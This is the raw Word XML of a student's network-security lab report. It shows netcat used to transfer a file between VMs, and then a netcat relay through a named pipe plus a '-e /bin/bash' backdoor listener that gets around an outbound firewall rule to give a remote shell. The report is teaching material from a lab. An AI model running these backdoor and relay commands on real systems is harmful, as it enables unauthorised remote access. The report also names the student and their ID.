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9650" w14:textId="0C72487E" w:rsidR="000A21C1" w:rsidRDefault="000A21C1" w:rsidP="00945CD6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk113226113"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Lab report 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248E3F01" w14:textId="6A3E19AC" w:rsidR="000A21C1" w:rsidRDefault="000A21C1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Student id: 700734097</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6BD1A5" w14:textId="58B64EC4" w:rsidR="000A21C1" w:rsidRDefault="000A21C1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Name : Balaramkrishna Ravi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ED0CB0" w14:textId="4C075855" w:rsidR="000A21C1" w:rsidRPr="000A21C1" w:rsidRDefault="000A21C1" w:rsidP="000A2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th</w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:t xml:space="preserve">directory </w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/usr/share/windows-binaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in kali </w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by using the </w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0485359D" w14:textId="77777777" w:rsidR="00945CD6" w:rsidRDefault="000A21C1" w:rsidP="00945CD6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nano whoami.exe | nc -l  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>94</w:t>
      </w:r>
      <w:r w:rsidR="00627AE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>93</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAB4331" w14:textId="7EEA7B32" w:rsidR="00627AE5" w:rsidRPr="00945CD6" w:rsidRDefault="009D7CD6" w:rsidP="00945CD6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8A4E5FE" wp14:editId="7918290C">
            <wp:extent cx="2941575" cy="1005927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5627" w14:textId="496CC3C6" w:rsidR="00FD7F43" w:rsidRPr="00FD7F43" w:rsidRDefault="00FD7F43" w:rsidP="00EF08FD">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E45BF7" w14:textId="32B7CB97" w:rsidR="000A21C1" w:rsidRPr="00FD7F43" w:rsidRDefault="00627AE5" w:rsidP="000A21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windows </w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10, in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command prompt open Tools and </w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>give</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> below</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidR="00FD7F43">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD7F43" w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C:\Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EFF645" w14:textId="25F6E348" w:rsidR="00FD7F43" w:rsidRDefault="00FD7F43" w:rsidP="00FD7F43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ry</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7F43">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> typ</w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7F43">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> th</w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7F43">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7F43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc.exe 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>209</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7F43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.128 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9493</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7F43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; whoami.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7F43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:t>here</w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:t>192.168.111.128 is the Kali Linux VM IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032EAC1F" w14:textId="0650ADCE" w:rsidR="00EF08FD" w:rsidRDefault="00EF08FD" w:rsidP="00FD7F43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60287760" wp14:editId="0B7878EB">
            <wp:extent cx="5692140" cy="662940"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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8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6A18D" w14:textId="6781F5AC" w:rsidR="00EF08FD" w:rsidRDefault="00EF08FD" w:rsidP="00FD7F43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06625AE1" w14:textId="722DF04D" w:rsidR="00EF08FD" w:rsidRDefault="00EF08FD" w:rsidP="00FD7F43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6768B321" wp14:editId="5819A3F4">
            <wp:extent cx="5943600" cy="237172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047B" w14:textId="77777777" w:rsidR="00EF08FD" w:rsidRPr="005029E0" w:rsidRDefault="00EF08FD" w:rsidP="00FD7F43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C6F51F" w14:textId="2C9FD19A" w:rsidR="00FD7F43" w:rsidRDefault="00FD7F43" w:rsidP="00FD7F43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidR="00945CD6">
        <w:t>netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:t xml:space="preserve"> and we need to give Kali Linux IP address (</w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>209</w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.128</w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9493</w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:t xml:space="preserve"> is the port number </w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whoami.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:t xml:space="preserve"> is the filename. Now the file is transferred successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D7C4C2" w14:textId="77777777" w:rsidR="000B25E0" w:rsidRDefault="000B25E0" w:rsidP="000B25E0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31616AA0" w14:textId="77777777" w:rsidR="000B25E0" w:rsidRDefault="000B25E0" w:rsidP="000B25E0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A38D3F8" w14:textId="21A42663" w:rsidR="000B25E0" w:rsidRPr="000B25E0" w:rsidRDefault="000B25E0" w:rsidP="000B25E0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B25E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TASK 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B0BC3" w14:textId="670A0B88" w:rsidR="00FD7F43" w:rsidRDefault="00945CD6" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>First we will try connecting SSH from kali through ubuntu VM(192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00674B9E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>209</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.130) </w:t>
      </w:r>
      <w:r w:rsidR="00F50336">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">using the command </w:t>
      </w:r>
      <w:r w:rsidR="00F50336" w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -oHostKeyAlgorithms=+ssh-dss </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00131505" w:rsidRPr="00AC1291">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>georgia@192.168.</w:t>
        </w:r>
        <w:r w:rsidR="00131505" w:rsidRPr="00AC1291">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>209</w:t>
        </w:r>
        <w:r w:rsidR="00131505" w:rsidRPr="00AC1291">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>.130</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4538A3EA" w14:textId="21CBE146" w:rsidR="007A430D" w:rsidRDefault="007A430D" w:rsidP="00F50336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7A7A91CE" wp14:editId="50748980">
            <wp:extent cx="4785360" cy="32918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C24CA" w14:textId="0B78E224" w:rsidR="00F50336" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stop the outbound TCP connections to kali using the below command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB232A5" w14:textId="77777777" w:rsidR="00F50336" w:rsidRPr="005029E0" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo iptables -A OUTPUT -p tcp --syn -j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293DA79F" w14:textId="3EE611DA" w:rsidR="00F50336" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Now we will connect SSH from kali to ubuntu, this connection will not be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47B70F" w14:textId="6DE61EB8" w:rsidR="00F50336" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>On the attacker side VM try to listen on port 2222 by executing the below command to access from the backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8BF16B" w14:textId="77777777" w:rsidR="00F50336" w:rsidRPr="005029E0" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc -lvp 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2E170" w14:textId="772CAC75" w:rsidR="00F50336" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>To check the backdoor connection run these</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E0F068" w14:textId="1089F600" w:rsidR="00F50336" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329762FC" w14:textId="180B9945" w:rsidR="00F50336" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003BDD1" w14:textId="0E5284C5" w:rsidR="00F50336" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Now open two terminals one will be with root user and the other will have a non-root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBC3B0F" w14:textId="1CDDE2D7" w:rsidR="00F50336" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the non-root terminal create netcat relay as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415AC947" w14:textId="77777777" w:rsidR="00F50336" w:rsidRPr="005029E0" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mknod /tmp/backpipe p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E88960" w14:textId="4FE1EA0D" w:rsidR="00F50336" w:rsidRPr="005029E0" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc -nv 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00131505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>209</w:t>
      </w:r>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.128 2222 0&lt;/tmp/backpipe | nc -nv 127.0.0.1 3333 1&gt;/tmp/backpipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07541FF6" w14:textId="79BD39A7" w:rsidR="00F50336" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>On the other terminal create a backdoor to listen on 3333.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C6FCC" w14:textId="77777777" w:rsidR="00F50336" w:rsidRPr="005029E0" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005029E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nc -lvp 3333 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10408B4C" w14:textId="0B15F5FB" w:rsidR="00F50336" w:rsidRDefault="00F50336" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Below are the pictures for client-client netcat relay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648A66A3" w14:textId="68820013" w:rsidR="00387555" w:rsidRDefault="00387555" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E49C7A5" w14:textId="34DF086F" w:rsidR="00A56712" w:rsidRDefault="00A56712" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="017465C5" wp14:editId="0A6FA9FC">
            <wp:extent cx="4175760" cy="1615440"/>
            <wp:effectExtent l="0" t="0" r="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6C8E" w14:textId="0D15D6F3" w:rsidR="00A56712" w:rsidRDefault="00A56712" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E3E80B" w14:textId="4EBD3088" w:rsidR="00A56712" w:rsidRDefault="00602630" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="532DA501" wp14:editId="1CE44818">
            <wp:extent cx="4892040" cy="822960"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="Text,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B9E5B" w14:textId="4C87E8F4" w:rsidR="00602630" w:rsidRDefault="00602630" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1500C2AB" w14:textId="1D05F565" w:rsidR="00602630" w:rsidRPr="00F50336" w:rsidRDefault="00F56153" w:rsidP="00F50336">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB6FCAA" wp14:editId="1CEF225C">
            <wp:extent cx="3451860" cy="777240"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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2630" w:rsidRPr="00F50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74E50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4B2CC4E"/>
    <w:lvl w:ilvl="0" w:tplc="9C0C23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5818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C1"/>
    <w:rsid w:val="000A21C1"/>
    <w:rsid w:val="000B25E0"/>
    <w:rsid w:val="00131505"/>
    <w:rsid w:val="00387555"/>
    <w:rsid w:val="00602630"/>
    <w:rsid w:val="00627AE5"/>
    <w:rsid w:val="00674B9E"/>
    <w:rsid w:val="007A430D"/>
    <w:rsid w:val="00945CD6"/>
    <w:rsid w:val="009D7CD6"/>
    <w:rsid w:val="00A56712"/>
    <w:rsid w:val="00EF08FD"/>
    <w:rsid w:val="00F50336"/>
    <w:rsid w:val="00F56153"/>
    <w:rsid w:val="00FD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F4AE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{09128DEE-68FB-4EAB-89D3-6AA14214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1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ia@192.168.209.13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Balaramkrishna Ravi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Balaramkrishna Ravi</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-05T03:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-05T04:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>